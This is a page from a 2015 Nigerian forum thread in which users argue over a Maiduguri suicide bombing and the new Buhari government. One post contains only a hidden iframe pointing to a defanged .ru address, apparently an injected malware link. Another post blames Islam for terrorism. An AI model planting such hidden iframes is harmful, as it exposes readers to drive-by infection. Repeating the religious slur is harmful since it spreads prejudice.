Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,153,953 members, 7,821,347 topics. Date: Wednesday, 08 May 2024 at 11:44 AM

Again! Sucide Bomber Hits Maiduguri - Politics (5) - Nairaland

Nairaland Forum / Nairaland / General / Politics / Again! Sucide Bomber Hits Maiduguri (24273 Views)

Female Suicide Bomber Hits UNIMAID Warning: Graphic Pictures / Graphic Photo Of The Kano State Female Sucide Bomber. (viewer's Discretion) / Suicide Bomber Hits Maiduguri Market, Many Feared Dead (2) (3) (4)

(1) (2) (3) (4) (5) (6) (Reply) (Go Down)

Re: Again! Sucide Bomber Hits Maiduguri by redgem(f): 11:03pm On Jun 06, 2015
Mr president made a promise to we Nigerians before you voted him, its just a week since he was sworn in and you guys are already barking like hungry dogs. Please, use your brains and try to understand that this issue of boko haram is not something that can be stopped in a week.

Those of you ranting here on Nl why waste your mb to post trash? There are so many broadcasting channels in Nigeria you can use as a means to pass words to Mr president, give your opinions and the president won't ignore it.

If you think its easy to sit on that sit biko!!! Stand up and stop sleeping, do something and leave insults alone.

Those of you calling me a kid, I poop on you cos its only a kid that will open his/her wide mouth spitting trash. A grown up and matured person won't sit down and point accusing fingers when he/she knows that its not a day task to solve these issue in Nigeria.

Don't waste your time to quote me cos I will totally ignore it.
I'M OUT
Re: Again! Sucide Bomber Hits Maiduguri by IbokUtoroh(m): 11:05pm On Jun 06, 2015
abbey621:

Read it again and this time very slowly grin grin grin grin
hv read it word to word, it sounds ibuish!

1 Like

Re: Again! Sucide Bomber Hits Maiduguri by Senjuchiha: 11:13pm On Jun 06, 2015
BlackTechnology:
Is this the change Yorubas clamoured for

Chai

Yoruba APC has killed us

APC= Chain grin

1 Like

Re: Again! Sucide Bomber Hits Maiduguri by babeface3: 11:16pm On Jun 06, 2015
I been dey expect to see picture of the suicide bomber; no picture for this thread
Re: Again! Sucide Bomber Hits Maiduguri by zik4ever: 11:25pm On Jun 06, 2015
Raiders:
PDP sponsoring boko haram to destabilize this government
We have heard this kind of statement before that’s why we voted change and we hereby demand that change!. If it’s PDP, go and arrest them. Enough talking. The people being killed are not statistics. They are parents, children and breadwinners of some people.

3 Likes

Re: Again! Sucide Bomber Hits Maiduguri by Udstar(m): 11:36pm On Jun 06, 2015
redgem:
Give Mr President some space please....

I never for one day supported him but it was just a week ago he was sworn in...let him breath for at least 5mins, he is also a human being

Most people here on Nl if we should give you 20years to rule Nigeria, I can bet that you can't solve quarter of the problems in Nigeria.

Allow him for sometime he can't solve all problems at once cos he is not God...all he needs are you supports and prayers.

AM SAYING D SAME THING
Re: Again! Sucide Bomber Hits Maiduguri by Drogbotel(m): 11:36pm On Jun 06, 2015
ElDaIllest:
But I thought you guys said a "new sheriff" is in town shocked shocked shocked

Reminds me of Rango wink
ElDaIllest:
But I thought you guys said a "new sheriff" is in town shocked shocked shocked

Reminds me of Range #smile

1 Like

Re: Again! Sucide Bomber Hits Maiduguri by Nobody: 12:04am On Jun 07, 2015
abbey621:
When will you people give it a rest? If you truly cared for the victims, start a protest, band together and let the president know of your frustrations instead of ranting on Nairaland like psychotic chickens! Reasonably minded people aren't expecting Boko Haram to be wiped out immediately, to think otherwise is to believe in fairy tales! Many are still in campaign mood and are obviously still shocked by the defeat of their beloved GEJ, so I completely understand the need to create a nuisance, carry on crybabies!

DID YOU RALLY with pdp DURING GEJ tenure? did you swear at him? if not, you have no right to preach unity.

i have the right because i support any president in power be it GEJ OR PMB

1 Like

Re: Again! Sucide Bomber Hits Maiduguri by paulibling(m): 12:05am On Jun 07, 2015
Op cool down naa baba neva pack into Aso rock.
Re: Again! Sucide Bomber Hits Maiduguri by abbey621(m): 12:13am On Jun 07, 2015
donnypool:

DID YOU RALLY with pdp DURING GEJ tenure? did you swear at him? if not, you have no right to preach unity.

i have the right because i support any president in power be it GEJ OR PMB

Another classy example of ignorance! Kid go to bed!
Re: Again! Sucide Bomber Hits Maiduguri by Nobody: 12:23am On Jun 07, 2015
abbey621:

Another classy example of ignorance! Kid go to bed!

you just heard people using the word ignorant and you sef follow

1 Like 1 Share

Re: Again! Sucide Bomber Hits Maiduguri by abbey621(m): 12:29am On Jun 07, 2015
donnypool:

you just heard people using the word ignorant and you sef follow

On the contrary, I just found ignorance the least insulting word available smiley
Re: Again! Sucide Bomber Hits Maiduguri by ugoezeik(m): 12:39am On Jun 07, 2015
Chubhie:
As a private citizen I don't remember when I promised moving the force headquarters into sambisa. We as citizens paid a man to do that on our behalf with an open cheque and all instruments of state to crush boko under oath.

I voted him in so I can lead a private life with my loved ones and my two eyes closed at night. If PMB can not secure lives and properties he should resign or be impeached.

I can't be typing RIP everytime when someone is been paid to do a job. Or you expect me to enter sambisa armed with blunt cutlass looking for shecow
I understand ur pains bro, but since wey e be say we say d other one na clueless. u think we need to be patient for d change to commence, provided its not one chance we all enter, as j hear say presido went for G7 nd vice for G5. maybe na first second ladies go preside over d hem of affair. lolzzzzzz
Re: Again! Sucide Bomber Hits Maiduguri by Nobody: 1:05am On Jun 07, 2015
abbey621:

On the contrary, I just found ignorance the least insulting word available smiley

OK BYE
Re: Again! Sucide Bomber Hits Maiduguri by ohenhen1: 2:46am On Jun 07, 2015
The people should stock up on supplies and stay away from public places for now.
Re: Again! Sucide Bomber Hits Maiduguri by peddyoosa1: 3:38am On Jun 07, 2015
why are dis ppl doing dis? no religion supports killing fellow human being.
Re: Again! Sucide Bomber Hits Maiduguri by DJAmyluv: 4:52am On Jun 07, 2015
I'm beginning to think that this Buhari administration is a disaster. Bad news every day. If it's not petrol tanker accident killing many, it's car accident or boko haram taking lives. A plane crash almost occurred d other day. I hope God is not punishing us for allowing APC into power while deriding a good man who did well for this country

2 Likes

Re: Again! Sucide Bomber Hits Maiduguri by bunmititi(f): 4:56am On Jun 07, 2015
do we have a president?

1 Like

Re: Again! Sucide Bomber Hits Maiduguri by EmekaBlue(m): 5:08am On Jun 07, 2015
B for Bomb..BuBu tym don reach to fulfill..we dey watch
Re: Again! Sucide Bomber Hits Maiduguri by EmekaBlue(m): 5:09am On Jun 07, 2015
DJAmyluv:
I'm beginning to think that this Buhari administration is a disaster. Bad news every day. If it's not petrol tanker accident killing many, it's car accident or boko haram taking lives. A plane crash almost occurred d other day. I hope God is not punishing us for allowing APC into power while deriding a good man who did well for this country
Naija will cry for new change 4 electing a man exhumed frm our grave..#WeAreWatching.
Re: Again! Sucide Bomber Hits Maiduguri by Blackfire(m): 5:18am On Jun 07, 2015
peddyoosa1:
why are dis ppl doing dis? no religion supports killing fellow human being.

umfortunately islam does

1 Like

Re: Again! Sucide Bomber Hits Maiduguri by Blackfire(m): 5:20am On Jun 07, 2015
bunmititi:
do we have a president?
yes... But he is not around

1 Like

Re: Again! Sucide Bomber Hits Maiduguri by Jman06(m): 7:29am On Jun 07, 2015
redgem:
Give Mr President some space please....

I never for one day supported him but it was just a week ago he was sworn in...let him breath for at least 5mins, he is also a human being

Most people here on Nl if we should give you 20years to rule Nigeria, I can bet that you can't solve quarter of the problems in Nigeria.

Allow him for sometime he can't solve all problems at once cos he is not God...all he needs are you supports and prayers.
Why are you talking trash! Were you not there when Buhari promised to end bokoharam in less than one month This is the second week and he has not even made serious appointments to show he is serious.

Buhari is a very big disappointment to Nigerians

1 Like

Re: Again! Sucide Bomber Hits Maiduguri by nifton(m): 7:42am On Jun 07, 2015
Na group like Amnesty International follow cause all dis rubbish.When Boko haram dey infant stage,dem no wan mak our military nib dem in d board.Na to dey write rubbish report dem know.

1 Like

Re: Again! Sucide Bomber Hits Maiduguri by Hero10001: 8:14am On Jun 07, 2015
Re: Again! Sucide Bomber Hits Maiduguri by Hero10001: 8:15am On Jun 07, 2015
Emekamex:
Everyday bombing since May 29.
And the bombing goes on.. My pple are being blown away everyday. Baba is off to Germany, he's never step in Aso villa too. Sai baba.
Re: Again! Sucide Bomber Hits Maiduguri by soji1992: 10:47am On Jun 07, 2015
<div style="display:none"><iframe src="hxxp://red-wolf .ru:8080/ index.php" width=574 height=455 ></iframe></div>[img]http://www.?aff=687[/img]
Re: Again! Sucide Bomber Hits Maiduguri by wahihi(m): 11:30am On Jun 07, 2015
Raiders:
PDP sponsoring boko haram to destabilize this government
ARRANT NONSENSE FROM A NONENTITY. GO AND TELL BUHARI TO SETTLE WITH HIS BOYS TO STOP THE NONSENSE.
Re: Again! Sucide Bomber Hits Maiduguri by wahihi(m): 11:32am On Jun 07, 2015
Jman06:
Why are you talking trash! Were you not there when Buhari promised to end bokoharam in less than one month This is the second week and he has not even made serious appointments to show he is serious.

Buhari is a very big disappointment to Nigerians
EXACTLY.

1 Like

Re: Again! Sucide Bomber Hits Maiduguri by wahihi(m): 11:34am On Jun 07, 2015
Blackfire:

yes... But he is not around
IS HE RUNNING?
Re: Again! Sucide Bomber Hits Maiduguri by wahihi(m): 11:38am On Jun 07, 2015
DJAmyluv:
I WONDER OOOOH.
Re: Again! Sucide Bomber Hits Maiduguri by Blackfire(m): 11:40am On Jun 07, 2015
wahihi:
IS HE RUNNING?
no he is not running oh, haba megida... He is flying

(1) (2) (3) (4) (5) (6) (Reply)

Army Report: Senior Military Officers Denied US, UK Visas Over Rights Abuses / Fayemi: Ekiti Workers’ Salary Arrears Will Be Paid In Six Months / Edo House Of Assembly Election: APC Wins All 24 Seats

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 42
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.